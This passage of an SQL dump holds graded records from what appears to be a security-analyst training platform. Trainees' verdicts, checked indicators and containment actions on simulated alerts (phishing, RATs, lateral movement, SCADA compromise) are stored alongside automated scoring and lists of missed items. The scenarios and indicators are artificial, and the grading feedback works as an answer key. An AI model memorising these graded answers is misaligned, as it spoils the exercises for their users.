(554, 232, 1445, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-10.0.5.12\",\"ip-203.0.113.5\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/14/2026, 10:05:06 AM\\nALERT: Establishing Persistence and Lateral Movement [OP: Operation In(ter)ception]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 10.0.5.12\\n- [IP] 203.0.113.5\\n- [USERNAME] jdoe\\n- [HASH] 7e4d2b6e3f8c6b1b9a3c342f5d7a8a3b\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-14T04:35:08.173Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-14 04:34:04', '2026-03-14 04:35:08', 0, NULL),
(555, 297, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-14 16:38:17', '2026-03-14 16:38:17', 0, NULL),
(556, 232, 1366, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.10\",\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/14/2026, 10:11:24 PM\\nALERT: Suspicious LinkedIn Connection Request [OP: Operation Dream Job]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 192.168.1.10\\n- [EMAIL] john.doe@toptechtalent.com\\n- [IP] 203.0.113.45\\n- [URL] http://maliciouslink.com/joboffer\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-14T16:41:24.172Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-14 19:45:21', '2026-03-14 16:40:21', '2026-03-14 16:41:24', 0, NULL);
INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES
(557, 232, 1367, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_3\",\"artifact_2\",\"ip-203.0.113.45\",\"ip-192.168.1.25\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/14/2026, 10:12:02 PM\\nALERT: Malicious Attachment in Follow-up Email [OP: Operation Dream Job]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 192.168.1.25\\n- [IP] 203.0.113.45\\n- [HASH] 7f5a8d7e5b9c4a6d9c3a7a8b5c6d4e5f\\n- [EMAIL] hr@fakesite.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-14T16:42:01.468Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-14 16:41:24', '2026-03-14 16:42:01', 0, NULL),
(558, 232, 1368, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.25\",\"hash-e99a18c4\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"block_hash\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/14/2026, 10:12:31 PM\\nALERT: Establishment of Remote Access Trojan (RAT) [OP: Operation Dream Job]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.25\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [FILENAME] lazarus_rat.dll\\n- [USERNAME] victim_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-14T16:42:29.922Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-14 16:42:02', '2026-03-14 16:42:29', 0, NULL),
(559, 232, 1369, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.5.23\",\"hash-e99a18c4\",\"artifact_3\"],\"selectedActions\":[\"reset_credentials\",\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/14/2026, 10:13:07 PM\\nALERT: Lateral Movement to Secure Network Segments [OP: Operation Dream Job]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.5.23\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-14T16:43:07.728Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-14 16:42:30', '2026-03-14 16:43:07', 0, NULL),
(560, 232, 1370, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-14 16:43:07', '2026-03-14 16:43:07', 0, NULL),
(561, 298, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-14 18:38:47', '2026-03-14 18:38:47', 0, NULL),
(562, 296, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-14 21:29:35', '2026-03-14 21:29:35', 0, NULL),
(563, 296, 704, 'investigating', NULL, NULL, NULL, NULL, '2026-03-15 00:38:13', '2026-03-14 21:30:13', '2026-03-14 21:30:13', 0, NULL),
(564, 296, 1466, 'graded', 84, 'Verdict is correct (+40). Missed critical artifacts: ip 203.0.113.45 (2/3). Missed response actions (4/5)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_4\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/14/2026, 9:33:46 PM\\nALERT: Initial Access via Spear Phishing [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [DOMAIN] update-portal.example.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-14T21:33:53.987Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts: ip 203.0.113.45 (2/3). Missed response actions (4/5)\",\"missed_items\":[\"ip: 203.0.113.45\",\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', '2026-03-15 00:37:46', '2026-03-14 21:32:46', '2026-03-14 21:33:53', 0, NULL),
(565, 34, 237, 'investigating', NULL, NULL, NULL, NULL, '2026-03-15 01:41:24', '2026-03-14 22:35:24', '2026-03-14 22:35:24', 0, NULL),
(566, 300, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-14 23:29:22', '2026-03-14 23:29:22', 0, NULL),
(567, 300, 316, 'investigating', NULL, NULL, NULL, NULL, '2026-03-15 03:05:30', '2026-03-14 23:55:30', '2026-03-14 23:55:30', 0, NULL),
(568, 34, 920, 'investigating', NULL, NULL, NULL, NULL, '2026-03-15 05:47:48', '2026-03-15 02:37:48', '2026-03-15 02:37:48', 0, NULL),
(569, 225, 236, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"A high number of login attempts indicates that this is a brute force attack.\",\"artifacts\":\"192.0.2.45, 203.0.113.5, admin\",\"analysis_answers\":{\"action_taken\":\"A high number of login attempts indicates that this is a brute force attack.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-15T10:50:09.550Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-15 13:46:09', '2026-03-15 10:41:09', '2026-03-15 10:51:00', 0, NULL),
(570, 225, 735, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.23\",\"ip-192.168.10.5\",\"domain-http://login\",\"artifact_1\"],\"selectedActions\":[\"block_hash\",\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 9:53:26 PM\\nALERT: Spear Phishing Email Detected with Malicious URL\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 198.51.100.23\\n- [IP] 192.168.10.5\\n- [DOMAIN] http://login.examp1e.com/secure\\n- [EMAIL] ceo@examp1e.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T10:53:32.339Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"block_url\",\"close_alert\"],\"strengths\":\"Solid analysis\"}', '2026-03-15 13:58:09', '2026-03-15 10:52:09', '2026-03-15 10:53:32', 0, NULL),
(571, 225, 242, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"Parent process, explorer.exe, ran powershell.exe, which is suspicious. A command was injected stealthily using -NoP -NonI -W Hidden. A registry was modified and this indicates an attacker is trying to execute malicious code.\",\"artifacts\":\"192.168.1.10, 2B2B6D120897FBB5783C3F8DCF57DBBA, calc.exe, DESKTOP-7GTHB9K, jdoe,\",\"analysis_answers\":{\"action_taken\":\"Parent process, explorer.exe, ran powershell.exe, which is suspicious. A command was injected stealthily using -NoP -NonI -W Hidden. A registry was modified and this indicates an attacker is trying to execute malicious code.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-16T02:58:46.091Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-15 14:02:30', '2026-03-15 10:54:30', '2026-03-16 02:59:00', 0, NULL),
(572, 297, 944, 'graded', 70, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (0/3)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.2.12\",\"ip-203.0.113.55\",\"domain-http://phish\",\"domain-companyx.com\",\"artifact_1\"],\"selectedActions\":[\"block_ip\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 6:47:10 PM\\nALERT: QR Code Phishing Attack\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.55\\n- [IP] 192.168.2.12\\n- [DOMAIN] http://phishing-site.com/qrcode\\n- [DOMAIN] companyx.com\\n- [EMAIL] it-support@companyx.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Block IP/Domain\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T11:47:14.948Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (0/3)\",\"missed_items\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"strengths\":\"Needs improvement\"}', '2026-03-15 14:50:54', '2026-03-15 11:41:54', '2026-03-15 11:47:14', 0, NULL),
(573, 297, 852, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-195.154.200.25\",\"artifact_2\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 6:50:38 PM\\nALERT: BEC Attempt Detected with CEO Impersonation\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 195.154.200.25\\n- [EMAIL] ceo@reta1lcorp.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Block IP/Domain\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T11:50:43.846Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-15 14:53:34', '2026-03-15 11:48:34', '2026-03-15 11:50:43', 0, NULL),
(574, 232, 248, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"False Positive\",\"executive_summary\":\"as from the scenario it may be possible that the cloud provider might be login from a different time zone or may be from different end point device, so the log was generated as low priority and there is not any brute force attack or impossible time travelling. \",\"artifacts\":\"{\\\"timestamp\\\":\\\"2023-10-05T11:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.120\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"n/a\\\",\\\"hostname\\\":\\\"SERVER-1\\\"}\",\"analysis_answers\":{\"action_taken\":\"as from the scenario it may be possible that the cloud provider might be login from a different time zone or may be from different end point device, so the log was generated as low priority and there is not any brute force attack or impossible time travelling. \",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-15T15:59:21.419Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-15 18:52:09', '2026-03-15 15:44:09', '2026-03-15 16:00:00', 0, NULL),
(575, 232, 244, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.0.15\",\"hash-3f5d2c7e\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 10:33:48 PM\\nALERT: Malware Detected on Endpoint via Suspicious Process Execution\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 10.0.0.15\\n- [HASH] 3f5d2c7e1d4b8f9a6a7f8b2d3a4c5d6e\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T17:03:51.364Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-15 19:07:29', '2026-03-15 16:00:29', '2026-03-15 17:03:51', 0, NULL),
(576, 232, 245, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"False Positive\",\"executive_summary\":\"The src_ip and dest_ip differ matters\",\"artifacts\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"DESKTOP-1\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\",\"analysis_answers\":{\"action_taken\":\"The src_ip and dest_ip differ matters\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-15T18:04:30.631Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-15 20:18:52', '2026-03-15 17:12:52', '2026-03-15 18:05:00', 0, NULL),
(577, 303, 268, 'graded', 93, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 11:18:43 PM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T17:49:09.880Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 17:13:19', '2026-03-15 17:49:09', 0, NULL),
(578, 303, 237, 'investigating', NULL, NULL, NULL, NULL, '2026-03-15 20:31:45', '2026-03-15 17:21:45', '2026-03-15 17:21:45', 0, NULL),
(579, 304, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-15 17:29:01', '2026-03-15 17:29:01', 0, NULL),
(580, 303, 269, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"collect_forensics\",\"isolate_host\",\"block_hash\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 11:20:56 PM\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T17:51:04.251Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 17:49:09', '2026-03-15 17:51:04', 0, NULL),
(581, 303, 270, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 11:23:02 PM\\nALERT: Persistence Mechanism Established [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n- [IP] 10.0.1.15\\n- [FILENAME] C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T17:53:04.701Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 17:51:04', '2026-03-15 17:53:04', 0, NULL),
(582, 303, 271, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.101\",\"ip-10.0.0.5\",\"hash-5f4dcc3b\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 11:24:50 PM\\nALERT: Lateral Movement to OT Network [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.101\\n- [IP] 10.0.0.5\\n- [HASH] 5f4dcc3b5aa765d61d8327deb882cf99\\n- [USERNAME] jdoe\\n- [IP] 203.0.113.55\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T17:54:52.168Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 17:53:04', '2026-03-15 17:54:52', 0, NULL),
(583, 303, 272, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.0.20\",\"hash-5d41402a\",\"artifact_2\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 11:26:09 PM\\nALERT: SCADA System Compromise [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.105\\n- [IP] 10.0.0.20\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [IP] 203.0.113.45\\n- [FILENAME] malicious_script.sh\\n- [USERNAME] unauthorized_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T17:56:11.157Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 17:54:52', '2026-03-15 17:56:11', 0, NULL),
